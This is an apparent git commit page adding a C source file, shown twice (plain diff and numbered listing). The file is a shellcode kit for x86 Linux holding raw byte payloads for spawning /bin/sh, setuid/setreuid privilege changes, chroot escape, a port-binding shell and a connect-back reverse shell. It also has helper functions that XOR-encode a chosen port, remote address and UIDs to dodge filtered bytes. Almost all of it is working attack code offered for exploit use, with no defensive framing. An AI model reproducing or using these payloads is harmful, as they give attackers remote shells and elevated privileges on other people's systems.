initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_linux.c
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 352 insertions, 0 deletions
diff --git a/other/shellkit/x86_linux.c b/other/shellkit/x86_linux.c
new file mode 100644
index 0000000..d8b6398
--- /dev/null
+++ b/other/shellkit/x86_linux.c
@@ -0,0 +1,352 @@
+/* FIXME: needs cleanup -sc
+ */
+#include <stdio.h>
+#include <string.h>
+#include <netinet/in.h>
+#include "shellcode.h"
+/* ATTENTION: this must be first of concated shellcodes and the last
+              one must be terminated with x86_TERMINATOR */
+shellcode       x86_linux_spset = {
+        "x86-linux-spset",
+        20,
+        "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
+        "\x74\x06\x39\xc3\x74\xf3\xeb\xf4",
+};
+shellcode       x86_linux_execvesh = {
+        "x86-linux-execvesh",
+        23,
+        "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
+};
+shellcode       x86_linux_exit = {
+        "x86-linux-exit",
+        5,
+        "\x31\xc0\x40\xcd\x80",
+};
+shellcode       x86_linux_setgid = {
+        "x86-linux-setgid",
+        14,
+        "\x6a\x2e\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
+        /*                     ^^  ^^ xor'ed with  ^^  ^^ is the uid */
+        "\xcd\x80",
+};
+shellcode       x86_linux_setuid = {
+        "x86-linux-setuid",
+        14,
+        "\x6a\x17\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
+        /*                     ^^  ^^ xor'ed with  ^^  ^^ is the uid */
+        "\xcd\x80",
+};
+shellcode       x86_linux_setreuid = {
+        "x86-linux-setreuid",
+        23,
+        "\x6a\x46\x58\x66\xbb\x41\x41\x66\x81\xf3\x41\x41"
+        /*                     ^^  ^^              ^^  ^^       */
+        "\x66\xb9\x42\x42\x66\x81\xf1\x42\x42\xcd\x80",
+        /*         ^^  ^^              ^^  ^^           */
+};
+shellcode       x86_linux_chmod = {
+        "x86-linux-chmod",
+        22,
+        "\xeb\x0f\x31\xc0\x5b\x88\x43\x00"
+        /*                             ^^ file name length      */
+        "\xb9\x41\x41\x41\x41\xb0\x0f\xcd\x80\xe8\xec\xff"
+        /*     ^^  ^^  ^^  ^^ mode                              */
+        "\xff\xff",
+};
+shellcode       x86_linux_chroot = {
+        "x86-linux-chroot",
+        42,
+        "\x99\xb9\x50\x73\x50\x73\x50\x68\x41\x41\x2e\x2e"
+        "\x89\xe3\xb0\x27\xcd\x80\xb0\x3d\xcd\x80\x80\xc3"
+        "\x02\xfe\xc2\xb0\x0c\xcd\x80\x80\xfa\x6a\x75\xf5"
+        "\xfe\xc3\xb0\x3d\xcd\x80",
+};
+shellcode       x86_linux_portshellsh = {
+        "x86-linux-portshellsh",
+        94,
+        "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
+        "\x89\xe1\xb0\x66\xcd\x80\x52\x66\x68\x50\x73\x66"
+        /*                                     ^^  ^^           */
+        "\x52\x89\xe2\x6a\x10\x52\x50\x89\xe1\xfe\xc3\x89"
+        "\xc2\xb0\x66\xcd\x80\x80\xc3\x02\xb0\x66\xcd\x80"
+        "\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
+        "\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
+        "\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
+        "\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
+};
+shellcode       x86_linux_connectsh = {
+        "x86-linux-connectsh",
+        88,
+        "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
+        "\x89\xe1\xb0\x66\xcd\x80\xb9\x41\x41\x41\x41\x81"
+        /*                             ^^  ^^  ^^  ^^           */
+        "\xf1\x3e\x41\x41\x40\x51\x66\x68\x50\x74\x66\x52"
+        /*     ^^  ^^  ^^  ^^              ^^  ^^               */
+        "\x89\xe1\x89\xc2\x6a\x10\x51\x52\x89\xe1\xb3\x03"
+        "\xb0\x66\xcd\x80\x89\xd3\x31\xc9\xb0\x3f\xcd\x80"
+        "\xfe\xc1\xb0\x3f\xcd\x80\xb0\x0b\x99\x52\x68\x6e"
+        "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
+        "\x89\xe1\xcd\x80",
+};
+shellcode       x86_linux_read = {
+        "x86-linux-read",
+        16,
+        "\xeb\x0e\xb2\xfa\x59\x6a\x41\x5b\x80\xf3\x41\x6a"
+        "\x03\x58\xcd\x80",
+};
+shellcode       *x86_linux_shellcodes[] = {
+        &x86_linux_chmod,
+        &x86_linux_chroot, 
+        &x86_linux_connectsh,
+        &x86_linux_execvesh,
+        &x86_linux_exit,
+        &x86_linux_portshellsh,
+        &x86_linux_read,
+        &x86_linux_setgid,
+        &x86_linux_setuid,
+        &x86_linux_setreuid,
+        &x86_linux_spset,
+        NULL,
+};
+arch    x86_linux = {
+        "x86-linux",
+        1,
+        NULL,   /* for nops use the same function as in arch bsd */
+        x86_linux_shellcodes
+};
+int
+isLegal (unsigned char x)               /* XXX: Move this to a global position */
+{
+        switch (x) {
+                case 0x00:
+                case 0x0a:
+                case 0x0d:
+                case 0x25:
+        return 0;
+        }
+        return 1;
+}
+unsigned short int
+getxorer (unsigned short int value)
+{
+        unsigned short int xor = 0x8f8f, temp;
+        
+        temp = (xor ^ value) & 0xff00; 
+        switch (temp) {
+            case 0x0000 : 
+            case 0x0a00 :
+            case 0x0d00 :
+            case 0x2500 : xor^=0x8000; 
+                          break;
+        }
+        temp = (xor ^ value) & 0xff; 
+        switch (temp) {
+            case 0x00 : 
+            case 0x0a :
+            case 0x0d :
+            case 0x25 : xor^=0x80; 
+                        break;
+        }
+        
+        return xor;
+}
+unsigned long int
+getxorer4 (unsigned long int v)
+{
+        unsigned long int       xor = 0x8f8f8f8f,
+                                temp,
+                                x;
+        for (x = 0; x < 4; x++) {
+                temp = ((xor ^ v) >> (x * 8)) & 0xff;
+                if (!isLegal (temp)) {
+                        xor ^= (0x80 << (x * 8));
+                }
+        }
+        return xor;
+}
+void
+x86_linux_chmod_setup (unsigned char *code, unsigned char *file,
+        unsigned long int mode)
+{
+        unsigned char   length = 0;
+        length = strlen (file);
+        if (length > 255 || !isLegal (length))  {
+                printf ("Change length of file name. code will be left unchanged.\n");
+                return;
+        }
+        code[7] = length;
+/* XXX: WRITE ME! */
+        return;
+}
+void
+x86_linux_setgid_setup (unsigned char *code, unsigned short int gid)
+{
+        unsigned short  xor = 0;
+        xor = getxorer (gid);
+        code[10] = xor & 0xff;
+        code[11] = (xor >> 8) & 0xff;
+        
+        gid ^=  xor;
+        code[5] = gid & 0xff;
+        code[6] = (gid >> 8) & 0xff;
+        return;
+}
+void
+x86_linux_setuid_setup (unsigned char *code, unsigned short int uid)
+{
+        unsigned short  xor = 0;
+        xor = getxorer (uid);
+        code[10] = xor & 0xff;
+        code[11] = (xor >> 8) & 0xff;
+        
+        uid ^=  xor;
+        code[5] = uid & 0xff;
+        code[6] = (uid >> 8) & 0xff;
+        return;
+}
+void
+x86_linux_setreuid_setup (unsigned char *code,
+        unsigned short int ruid, unsigned short int euid)
+{
+        unsigned short  xor_a = 0,
+                        xor_b = 0;
+        xor_a = getxorer (ruid);
+        xor_b = getxorer (euid);
+        code[10] = xor_a & 0xff;
+        code[11] = (xor_a >> 8) & 0xff;
+        code[19] = xor_b & 0xff;
+        code[20] = (xor_b >> 8) & 0xff;
+        ruid ^= xor_a;
+        euid ^= xor_b;
+        code[5] = ruid & 0xff;
+        code[6] = (ruid >> 8) & 0xff;
+        code[14] = euid & 0xff;
+        code[15] = (euid >> 8) & 0xff;
+        return;
+}
+void
+x86_linux_portshell_setup (unsigned char *code, unsigned short int port)
+{
+        port = htons (port);
+        if (!isLegal(port & 0xff) || !isLegal((port & 0xff00) >> 8))  {
+                printf ("Error:\t choosen port would produced illegal bytes.\n");
+                printf ("\t code will be left unchanged.\n");
+                return;
+        }
+        code[22] = (port >> 8) & 0xff;
+        code[21] = port & 0xff;
+        return;
+}
+void
+x86_linux_connectshell_setup (unsigned char *code,
+        unsigned long int raddr,
+        unsigned short int rport)
+{
+        unsigned long int       raddr_xor = 0;
+        rport = htons (rport);
+        if (!isLegal(rport & 0xff) || !isLegal((rport & 0xff00) >> 8))  {
+                printf ("Error:\t choosen remote port would produced illegal bytes.\n");
+                printf ("\t code will be left unchanged.\n");
+                return;
+        }
+        raddr_xor = getxorer4 (raddr);
+        raddr ^= raddr_xor;
+        code[22] = (raddr_xor >> 24) & 0xff;
+        code[21] = (raddr_xor >> 16) & 0xff;
+        code[20] = (raddr_xor >> 8) & 0xff;
+        code[19] = raddr_xor & 0xff;
+        code[28] = (raddr >> 24) & 0xff;
+        code[27] = (raddr >> 16) & 0xff;
+        code[26] = (raddr >> 8) & 0xff;
+        code[25] = raddr & 0xff;
+        code[33] = (rport >> 8) & 0xff;
+        code[32] = rport & 0xff;
+        return;
+}
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_linux.c
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/x86_linux.c b/other/shellkit/x86_linux.c new file mode 100644 index 0000000..d8b6398 --- /dev/null +++ b/other/shellkit/x86_linux.c
@@ -0,0 +1,352 @@
	1	/* FIXME: needs cleanup -sc
	2	*/
	3
	4	#include <stdio.h>
	5	#include <string.h>
	6	#include <netinet/in.h>
	7	#include "shellcode.h"
	8
	9
	10	/* ATTENTION: this must be first of concated shellcodes and the last
	11	one must be terminated with x86_TERMINATOR */
	12	shellcode x86_linux_spset = {
	13	"x86-linux-spset",
	14	20,
	15	"\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
	16	"\x74\x06\x39\xc3\x74\xf3\xeb\xf4",
	17	};
	18
	19
	20	shellcode x86_linux_execvesh = {
	21	"x86-linux-execvesh",
	22	23,
	23	"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
	24	"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
	25	};
	26
	27
	28	shellcode x86_linux_exit = {
	29	"x86-linux-exit",
	30	5,
	31	"\x31\xc0\x40\xcd\x80",
	32	};
	33
	34
	35	shellcode x86_linux_setgid = {
	36	"x86-linux-setgid",
	37	14,
	38	"\x6a\x2e\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
	39	/* ^^ ^^ xor'ed with ^^ ^^ is the uid */
	40	"\xcd\x80",
	41	};
	42
	43
	44	shellcode x86_linux_setuid = {
	45	"x86-linux-setuid",
	46	14,
	47	"\x6a\x17\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
	48	/* ^^ ^^ xor'ed with ^^ ^^ is the uid */
	49	"\xcd\x80",
	50	};
	51
	52
	53	shellcode x86_linux_setreuid = {
	54	"x86-linux-setreuid",
	55	23,
	56	"\x6a\x46\x58\x66\xbb\x41\x41\x66\x81\xf3\x41\x41"
	57	/* ^^ ^^ ^^ ^^ */
	58	"\x66\xb9\x42\x42\x66\x81\xf1\x42\x42\xcd\x80",
	59	/* ^^ ^^ ^^ ^^ */
	60	};
	61
	62
	63	shellcode x86_linux_chmod = {
	64	"x86-linux-chmod",
	65	22,
	66	"\xeb\x0f\x31\xc0\x5b\x88\x43\x00"
	67	/* ^^ file name length */
	68	"\xb9\x41\x41\x41\x41\xb0\x0f\xcd\x80\xe8\xec\xff"
	69	/* ^^ ^^ ^^ ^^ mode */
	70	"\xff\xff",
	71	};
	72
	73
	74	shellcode x86_linux_chroot = {
	75	"x86-linux-chroot",
	76	42,
	77	"\x99\xb9\x50\x73\x50\x73\x50\x68\x41\x41\x2e\x2e"
	78	"\x89\xe3\xb0\x27\xcd\x80\xb0\x3d\xcd\x80\x80\xc3"
	79	"\x02\xfe\xc2\xb0\x0c\xcd\x80\x80\xfa\x6a\x75\xf5"
	80	"\xfe\xc3\xb0\x3d\xcd\x80",
	81	};
	82
	83
	84	shellcode x86_linux_portshellsh = {
	85	"x86-linux-portshellsh",
	86	94,
	87	"\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
	88	"\x89\xe1\xb0\x66\xcd\x80\x52\x66\x68\x50\x73\x66"
	89	/* ^^ ^^ */
	90	"\x52\x89\xe2\x6a\x10\x52\x50\x89\xe1\xfe\xc3\x89"
	91	"\xc2\xb0\x66\xcd\x80\x80\xc3\x02\xb0\x66\xcd\x80"
	92	"\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
	93	"\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
	94	"\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
	95	"\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
	96	};
	97
	98
	99	shellcode x86_linux_connectsh = {
	100	"x86-linux-connectsh",
	101	88,
	102	"\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
	103	"\x89\xe1\xb0\x66\xcd\x80\xb9\x41\x41\x41\x41\x81"
	104	/* ^^ ^^ ^^ ^^ */
	105	"\xf1\x3e\x41\x41\x40\x51\x66\x68\x50\x74\x66\x52"
	106	/* ^^ ^^ ^^ ^^ ^^ ^^ */
	107	"\x89\xe1\x89\xc2\x6a\x10\x51\x52\x89\xe1\xb3\x03"
	108	"\xb0\x66\xcd\x80\x89\xd3\x31\xc9\xb0\x3f\xcd\x80"
	109	"\xfe\xc1\xb0\x3f\xcd\x80\xb0\x0b\x99\x52\x68\x6e"
	110	"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
	111	"\x89\xe1\xcd\x80",
	112	};
	113
	114
	115	shellcode x86_linux_read = {
	116	"x86-linux-read",
	117	16,
	118	"\xeb\x0e\xb2\xfa\x59\x6a\x41\x5b\x80\xf3\x41\x6a"
	119	"\x03\x58\xcd\x80",
	120	};
	121
	122
	123	shellcode *x86_linux_shellcodes[] = {
	124	&x86_linux_chmod,
	125	&x86_linux_chroot,
	126	&x86_linux_connectsh,
	127	&x86_linux_execvesh,
	128	&x86_linux_exit,
	129	&x86_linux_portshellsh,
	130	&x86_linux_read,
	131	&x86_linux_setgid,
	132	&x86_linux_setuid,
	133	&x86_linux_setreuid,
	134	&x86_linux_spset,
	135	NULL,
	136	};
	137
	138
	139	arch x86_linux = {
	140	"x86-linux",
	141	1,
	142	NULL, /* for nops use the same function as in arch bsd */
	143	x86_linux_shellcodes
	144	};
	145
	146
	147	int
	148	isLegal (unsigned char x) /* XXX: Move this to a global position */
	149	{
	150	switch (x) {
	151	case 0x00:
	152	case 0x0a:
	153	case 0x0d:
	154	case 0x25:
	155	return 0;
	156	}
	157	return 1;
	158	}
	159
	160
	161	unsigned short int
	162	getxorer (unsigned short int value)
	163	{
	164	unsigned short int xor = 0x8f8f, temp;
	165
	166
	167	temp = (xor ^ value) & 0xff00;
	168	switch (temp) {
	169	case 0x0000 :
	170	case 0x0a00 :
	171	case 0x0d00 :
	172	case 0x2500 : xor^=0x8000;
	173	break;
	174	}
	175
	176	temp = (xor ^ value) & 0xff;
	177	switch (temp) {
	178	case 0x00 :
	179	case 0x0a :
	180	case 0x0d :
	181	case 0x25 : xor^=0x80;
	182	break;
	183	}
	184
	185	return xor;
	186	}
	187
	188
	189	unsigned long int
	190	getxorer4 (unsigned long int v)
	191	{
	192	unsigned long int xor = 0x8f8f8f8f,
	193	temp,
	194	x;
	195
	196
	197	for (x = 0; x < 4; x++) {
	198	temp = ((xor ^ v) >> (x * 8)) & 0xff;
	199	if (!isLegal (temp)) {
	200	xor ^= (0x80 << (x * 8));
	201	}
	202	}
	203
	204	return xor;
	205	}
	206
	207
	208	void
	209	x86_linux_chmod_setup (unsigned char code, unsigned char file,
	210	unsigned long int mode)
	211	{
	212	unsigned char length = 0;
	213
	214
	215	length = strlen (file);
	216	if (length > 255 \|\| !isLegal (length)) {
	217	printf ("Change length of file name. code will be left unchanged.\n");
	218	return;
	219	}
	220	code[7] = length;
	221
	222	/* XXX: WRITE ME! */
	223
	224	return;
	225	}
	226
	227
	228	void
	229	x86_linux_setgid_setup (unsigned char *code, unsigned short int gid)
	230	{
	231	unsigned short xor = 0;
	232
	233
	234	xor = getxorer (gid);
	235
	236	code[10] = xor & 0xff;
	237	code[11] = (xor >> 8) & 0xff;
	238
	239	gid ^= xor;
	240
	241	code[5] = gid & 0xff;
	242	code[6] = (gid >> 8) & 0xff;
	243
	244	return;
	245	}
	246
	247
	248	void
	249	x86_linux_setuid_setup (unsigned char *code, unsigned short int uid)
	250	{
	251	unsigned short xor = 0;
	252
	253
	254	xor = getxorer (uid);
	255
	256	code[10] = xor & 0xff;
	257	code[11] = (xor >> 8) & 0xff;
	258
	259	uid ^= xor;
	260
	261	code[5] = uid & 0xff;
	262	code[6] = (uid >> 8) & 0xff;
	263
	264	return;
	265	}
	266
	267
	268	void
	269	x86_linux_setreuid_setup (unsigned char *code,
	270	unsigned short int ruid, unsigned short int euid)
	271	{
	272	unsigned short xor_a = 0,
	273	xor_b = 0;
	274
	275
	276	xor_a = getxorer (ruid);
	277	xor_b = getxorer (euid);
	278
	279	code[10] = xor_a & 0xff;
	280	code[11] = (xor_a >> 8) & 0xff;
	281
	282	code[19] = xor_b & 0xff;
	283	code[20] = (xor_b >> 8) & 0xff;
	284
	285	ruid ^= xor_a;
	286	euid ^= xor_b;
	287
	288	code[5] = ruid & 0xff;
	289	code[6] = (ruid >> 8) & 0xff;
	290
	291	code[14] = euid & 0xff;
	292	code[15] = (euid >> 8) & 0xff;
	293
	294	return;
	295	}
	296
	297
	298	void
	299	x86_linux_portshell_setup (unsigned char *code, unsigned short int port)
	300	{
	301	port = htons (port);
	302
	303	if (!isLegal(port & 0xff) \|\| !isLegal((port & 0xff00) >> 8)) {
	304	printf ("Error:\t choosen port would produced illegal bytes.\n");
	305	printf ("\t code will be left unchanged.\n");
	306	return;
	307	}
	308
	309	code[22] = (port >> 8) & 0xff;
	310	code[21] = port & 0xff;
	311
	312	return;
	313	}
	314
	315
	316	void
	317	x86_linux_connectshell_setup (unsigned char *code,
	318	unsigned long int raddr,
	319	unsigned short int rport)
	320	{
	321	unsigned long int raddr_xor = 0;
	322
	323
	324	rport = htons (rport);
	325	if (!isLegal(rport & 0xff) \|\| !isLegal((rport & 0xff00) >> 8)) {
	326	printf ("Error:\t choosen remote port would produced illegal bytes.\n");
	327	printf ("\t code will be left unchanged.\n");
	328
	329	return;
	330	}
	331
	332	raddr_xor = getxorer4 (raddr);
	333
	334	raddr ^= raddr_xor;
	335
	336	code[22] = (raddr_xor >> 24) & 0xff;
	337	code[21] = (raddr_xor >> 16) & 0xff;
	338	code[20] = (raddr_xor >> 8) & 0xff;
	339	code[19] = raddr_xor & 0xff;
	340
	341	code[28] = (raddr >> 24) & 0xff;
	342	code[27] = (raddr >> 16) & 0xff;
	343	code[26] = (raddr >> 8) & 0xff;
	344	code[25] = raddr & 0xff;
	345
	346	code[33] = (rport >> 8) & 0xff;
	347	code[32] = rport & 0xff;
	348
	349	return;
	350	}
	351
	352